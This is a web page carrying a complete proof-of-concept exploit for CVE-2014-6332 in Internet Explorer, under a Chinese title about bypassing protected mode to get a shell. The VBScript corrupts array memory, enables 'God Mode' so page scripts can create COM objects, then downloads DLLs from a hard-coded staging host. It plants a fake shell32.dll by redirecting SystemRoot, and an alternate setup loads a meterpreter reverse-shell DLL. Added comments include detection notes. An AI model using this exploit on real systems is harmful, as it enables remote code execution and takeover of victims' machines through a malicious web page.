CVE-2014-6332 PoC 绕过保护模式获取shell

 

<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
Tested on IE11 + Windows 7 64-bit

References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html
- https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf
- http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb
-->

<script>// <![CDATA[
// Shared XMLHttpRequest: created in getdll(), inspected in handler().
var oReq;
/**
 * Start an asynchronous GET for `downloadFile` from the staging host
 * hard-coded below; completion is delivered to handler() through the
 * shared oReq. The base URL (and the localhost:5555 navigation in
 * tolocal()) are the network-side indicators of this page.
 *
 * @param {string} downloadFile  file name appended to the base URL
 */
function getdll(downloadFile)
{
    var url = "http://192.168.1.100/" + downloadFile;
    oReq = new XMLHttpRequest();
    oReq.open("GET", url, true);
    oReq.onreadystatechange = handler;
    oReq.send();
}

/**
 * readystatechange callback for the shared oReq: hands off to the
 * VBScript OnDownloadDone() only once the request is DONE with HTTP 200.
 * status is deliberately not read before readyState reaches 4.
 */
function handler()
{
    if (oReq.readyState != 4) {
        return;
    }
    if (oReq.status != 200) {
        return;
    }
    OnDownloadDone();
}

/**
 * Navigate the current window to the stage-2 page served on localhost:5555.
 * Called from loaddll() in the three-file configuration only.
 */
function tolocal()
{
    var stage2 = "http://localhost:5555/stage2.html";
    location.href = stage2;
}
// ]]></script>

<script>// <![CDATA[
' local server files to get medium integrity
' downloadFiles(n): names getdll() requests from the staging host, in order;
' cacheRegex(n): pattern OnDownloadDone() uses to find downloadFiles(n)
' once IE has written it to its cache.
downloadFiles = Array("ieshell32.dll", "ielocalserver.dll", "stage2.html")
cacheRegex = Array("^ieshell32[d].dll$", "^ielocalserver[d].dll$", "^stage2[d].htm$")
' reverse meterpreter shell files
' (alternate two-file configuration; loaddll() keys its stage-2 steps on
' UBound(downloadFiles) = 2, so they are skipped with this pair)
'downloadFiles = Array("ieshell32.dll", "metp.dll")
'cacheRegex = Array("^ieshell32[d].dll$", "^metp[d].dll$")
' cacheFiles(n): full cache path resolved for downloadFiles(n); four slots
' are declared although at most three names are listed above.
Dim cacheFiles(3)

' index into downloadFiles of the file currently being fetched
Dim downloadState
' set to Now when a download starts; only referenced by the commented-out
' DateDiff check in SearchCache()
Dim pinTime

' Scripting.FileSystemObject / WScript.Shell / Shell.Application instances,
' created in runshell() and loaddll(). A page script being able to create
' these is the condition the preceding script block establishes.
Dim oFSO
Dim oWS
Dim shell

function FindFile(path, regexFile)
    ' Return the name of the first file directly inside `path` whose name
    ' matches the RegExp object `regexFile`, or "" when none does.
    ' Relies on the module-level oFSO (Scripting.FileSystemObject).
    Dim entry
    FindFile = ""
    For Each entry In oFSO.GetFolder(path).Files
        If regexFile.Test(entry.Name) = True Then
            FindFile = entry.Name
            Exit Function
        End If
    Next
end function

function SearchCache(path, regexFile)
    ' Walk the immediate subfolders of `path` and return the full path of
    ' the first file matching `regexFile`, or "" if no subfolder holds one.
    ' The DateDiff filter on pinTime is left disabled.
    Dim entry, folderPath, found
    SearchCache = ""
    For Each entry In oFSO.GetFolder(path).SubFolders
        'If DateDiff("s", pinTime, entry.DateLastModified) >= 0 Then
            folderPath = path & "" & entry.Name
            found = FindFile(folderPath, regexFile)
            If found <> "" Then
                SearchCache = folderPath & "" & found
                Exit Function
            End If
        'End If
    Next
end function

function loaddll()
    ' Stages the cached downloads on disk and creates a Shell.Application
    ' instance while the process-level %SystemRoot% is redirected.
    ' The steps are order-sensitive (copy -> env override -> CreateObject ->
    ' cleanup) and every error is swallowed by On Error Resume Next.
    On Error Resume Next

    ' Process-scoped environment only; nothing set here outlives the IE process.
    Set wshSystemEnv = oWS.Environment("Process")
    tmpDir = oFSO.GetSpecialFolder(2)           ' 2 = TemporaryFolder
    
    ' NOTE(review): the path literals in this block appear to have lost
    ' characters in extraction; treat the exact paths as unverified.
    tmpSysDir = tmpDir & "System32"
    tmpShellFile = tmpSysDir & "shell32.dll"
    ' cacheFiles(0) is the cached ieshell32.dll, written below the temp dir
    ' under the name shell32.dll
    oFSO.CreateFolder(tmpSysDir)
    oFSO.CopyFile cacheFiles(0), tmpShellFile
    
    ' second download (ielocalserver.dll or metp.dll) copied to the temp dir;
    ' its path is passed on through the MyDllPath environment variable
    mydllFile = tmpDir & "" & downloadFiles(1)
    oFSO.CopyFile cacheFiles(1), mydllFile
    wshSystemEnv("MyDllPath") = mydllFile
    
    ' three-file configuration only: stage the page tolocal() navigates to
    If (UBound(downloadFiles) = 2) Then
        stage2File = tmpDir & "stage2.html"
        oFSO.CopyFile cacheFiles(2), stage2File
        wshSystemEnv("stage2file") = stage2File
    End If
    
    ' Point %SystemRoot% at the temp dir before the CreateObject call; the
    ' real value is parked in SaveSystemRoot and is not restored here.
    saveRoot = wshSystemEnv("SystemRoot")
    wshSystemEnv("SaveSystemRoot") = saveRoot
    wshSystemEnv("SystemRoot") = tmpDir
    Set shell = CreateObject("Shell.Application")
    ' have to restore %SystemRoot% in dll, not here
    
    ' Detection note: a shell32.dll written under a user temp folder, a
    ' process-level SystemRoot override, and Shell.Application being created
    ' by the IE renderer are the host-side artifacts of this step; the
    ' cleanup below removes the file and folder but not the env changes.
    oFSO.DeleteFile tmpShellFile
    oFSO.DeleteFolder tmpSysDir
    
    If (UBound(downloadFiles) = 2) Then
        call tolocal()
    End If
end function

Sub OnDownloadDone()
    ' Called from the JavaScript XHR handler once a download completed.
    ' Locates the file IE wrote to its cache under %LOCALAPPDATA%, records
    ' the path in cacheFiles(downloadState), then either fetches the next
    ' file or, when the last one is in, runs loaddll().
    cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%")
    cacheDir = cacheDir & "MicrosoftWindowsTemporary Internet FilesLowContent.IE5"
    
    Set regexFile = new regexp
    regexFile.Pattern = cacheRegex(downloadState)
    cacheFiles(downloadState) = SearchCache(cacheDir, regexFile)
    ' Not found in the cache: stop silently; nothing retries from here.
    If cacheFiles(downloadState) = "" Then
        Exit Sub
    End If
    
    If downloadState = UBound(downloadFiles) Then
        loaddll()
    Else
        downloadState = downloadState + 1
        DoDownload()
    End If
End Sub

Sub DoDownload()
    ' Stamps pinTime and asks the JavaScript side (getdll) to fetch the file
    ' for the current downloadState; completion comes back via OnDownloadDone.
    pinTime = Now
    call getdll(downloadFiles(downloadState))
End Sub

Sub runshell()
    ' Entry point from Begin() after EnableGodMode(): creates the two COM
    ' objects the rest of this block relies on and starts the first download.
    ' Detection note: these CreateObject calls succeeding inside a web page
    ' are the first observable post-exploitation step.
    Set oFSO = CreateObject("Scripting.FileSystemObject")
    Set oWS = CreateObject("WScript.Shell")
    downloadState = 0
    DoDownload()
End Sub
 
// ]]></script>

<script>// <![CDATA[
' arrX / arrY: the two dynamic arrays whose overlap Trigger() establishes;
' the reads and writes in the functions below go through their elements.
dim arrX()
dim arrY()

' asize: array size for the current attempt; incsize: per-attempt increment
' (both randomised in Init()); olapPos: arrX index used after a successful trigger
dim asize
dim incsize
dim olapPos

' Runs on page load (the function definitions below are hoisted).
Begin()

function Begin()
    ' Top-level driver: pick sizes, retry Trigger() via Exploit() until it
    ' reports success, run EnableGodMode(), then hand off to runshell().
    ' Errors are suppressed throughout. Note that EnableGodMode()'s Boolean
    ' result is not checked: runshell() runs even when it returned False.
    On Error Resume Next
    Init()
    If Exploit() = True Then
        EnableGodMode()
        ' shrink arrX back to its nominal size before the staging code runs
        redim Preserve arrX(asize)
        runshell()
    End If
end function

function Init()
    ' Seed the RNG and pick a random starting size and step for Exploit();
    ' why these particular ranges were chosen is not stated.
    Randomize()
    asize = 13 + 17*rnd(6)
    incsize = 7 + 3*rnd(5)
end function

function Exploit()
    ' Retry loop: grow asize by incsize and call Trigger() up to 401 times,
    ' returning True as soon as one attempt reports success (False otherwise).
    dim i
    Exploit = False
    For i = 0 To 400
        asize = asize + incsize
        If Trigger() = True Then
            Exploit = True
            Exit For
        End If
    Next
end function

function Trigger()
    ' One attempt at the array-resize bug the page's references describe:
    ' resize arrX to asize + &h8000000 elements and test whether the element
    ' at olapPos now reports VarType &h2f66, the value the author uses as the
    ' success signal. On any other outcome arrX is shrunk back and the caller
    ' retries with a larger asize. Statement order is load-bearing here.
    On Error Resume Next
    dim typev
    dim ofnumele
    
    Trigger = False
    olapPos = asize + 2
    ofnumele = asize + &h8000000
    
    redim Preserve arrX(asize)
    redim arrY(asize)
    redim Preserve arrX(ofnumele)
    
    typev = 1
    arrY(0) = 1.123456789012345678901234567890
    
    ' Only read VarType of arrX(olapPos) when neither it nor its predecessor
    ' is an object and the predecessor is not Empty (VarType 0).
    If (IsObject(arrX(olapPos-1)) = False) Then
        If (VarType(arrX(olapPos-1)) <> 0) Then
            If (IsObject(arrX(olapPos)) = False) Then
                typev = VarType(arrX(olapPos))
            End If
        End If
    End If
    
    If (typev = &h2f66) Then
        Trigger = True
    Else
        redim Preserve arrX(asize)
    End If
end function

function ReadMemInt(addr)
    ' Read primitive built on the arrX/arrY overlap: stores addr+4 into the
    ' overlapped element, toggles arrY(0) from 0 to 8 around that store, and
    ' returns LenB() of the element. The caller (EnableGodMode) treats the
    ' result as a value read from addr; that interpretation rests on the
    ' engine's variant layout and is not visible in this script.
    ' Do not reorder these four statements.
    arrY(0) = 0
    arrX(olapPos) = addr+4
    arrY(0) = 8
    ReadMemInt = lenb(arrX(olapPos))
end function

function EnableGodMode()
    ' Starting from the value LeakFnAddr() returns, follows two ReadMemInt
    ' hops, then scans entries at i+&h120 (stride 4, up to &h60) for one equal
    ' to 14 and writes arrY(4) at i+&h11c+k. The name refers to the engine
    ' state that write changes (see the page's references). Returns True on
    ' success, False if no matching entry is found within the scan range;
    ' Begin() ignores this result.
    ' Detection note: the observable effect is that the page can then create
    ' COM objects (see runshell()); alerting on that is more robust than
    ' matching these offsets, which are specific to one engine build.
    i = LeakFnAddr()
    i = ReadMemInt(i+8)
    i = ReadMemInt(i+16)
    
    ' Unescaped bytes placed into the overlapped element; what the indexed
    ' assignment below does with them is layout-specific and is covered by
    ' the page's references rather than here.
    myarray = Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uFFFF%u7FFF%u0000%u0000")
    arrX(olapPos+2) = myarray
    arrY(2) = 8192 + 12
    
    EnableGodMode = False
    For k=0 To &h60 step 4
        j = ReadMemInt(i+&h120+k)
        If (j = 14) Then
            arrX(olapPos+2)(i+&h11c+k) = arrY(4)
            EnableGodMode = True
            Exit For
        End If
    Next
end function

' Intentionally empty; LeakFnAddr() only needs a reference to it.
sub dummyfn()
end sub

function LeakFnAddr()
    ' Assigns dummyfn to i, then null, stores i into the overlapped arrX
    ' element with arrY(0) = 0 and reads it back with arrY(0) = 3.
    ' EnableGodMode() uses the returned value as an address; what the
    ' variant holds at that point depends on engine internals not shown
    ' here. Order-sensitive; On Error Resume Next hides any failure.
    On Error Resume Next
    i = dummyfn
    i = null
    arrY(0) = 0
    arrX(olapPos) = i
    arrY(0) = 3
    LeakFnAddr = arrX(olapPos)
end function
// ]]></script>

